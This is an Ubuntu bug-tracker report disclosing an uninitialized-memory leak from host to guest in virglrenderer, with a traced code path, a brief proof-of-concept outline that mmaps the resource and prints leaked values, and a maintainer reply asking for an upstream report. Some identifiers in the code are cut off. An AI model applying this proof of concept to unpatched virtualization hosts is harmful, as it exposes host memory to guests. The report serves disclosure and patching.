information leak from host to guest in the virglrenderer
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
virglrenderer (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned | ||
Bionic |
Triaged
|
Undecided
|
Unassigned | ||
Focal |
Fix Released
|
Undecided
|
Unassigned | ||
Impish |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Env
===
Description: Ubuntu 20.04.3 LTS
Release: 20.04
Package
=======
virglrenderer
Vulnerability
=============
The gr->ptr is allocated without initialization at the vrend_renderer_
virtio_
|
|-> virgl_cmd_
|
|-> virgl_renderer_
|
|-> vrend_renderer_
|
| if(args->target == PIPE_BUFFER && args->bind == VIRGL_BIND_CUSTOM) {
| gr->storage_bits |= VREND_STORAGE_
| gr->ptr = malloc(
| }
The memory pointed by the gr->ptr can be read from the guest kernel. And the code path is as following:
virtio_
|
|-> virgl_resource_
|
|-> virgl_renderer_
|
|-> vrend_renderer_
|
| res = vrend_resource_
| res->iov = iov;
| res->num_iovs = num_iovs;
| vrend_write_
| res->ptr, res->base.width0); // -- Here ---
However, the memory holding the data can be mmapped to the guest usersapce process. And we can leak lots data as the size of the heap(args->width) is controlled by user.
The PoC is as following:
dev = open(VIRTIO_GPU, O_RDONLY);
ioctl(dev, DRM_IOCTL_
ioctl(dev, DRM_IOCTL_
ptr = mmap(0, MAP_SZ, PROT_READ, MAP_SHARED, dev, vmap.offset);
for (i = 0; i < WIDTH/sizeof(*ptr); i++)
LOG("leak: ptr[%d]=%#lx\n", i, ptr[i]);
CVE References
tags: | added: community-security |
Hi,
Have you reported this issue to the virglrenderer developers?
If not, please report it to them. The bug tracker is here:
https:/ /gitlab. freedesktop. org/virgl/ virglrenderer/ -/issues
Once you have done that, please let us know the bug number and once a fix is available we will package it for Ubuntu.
Thanks!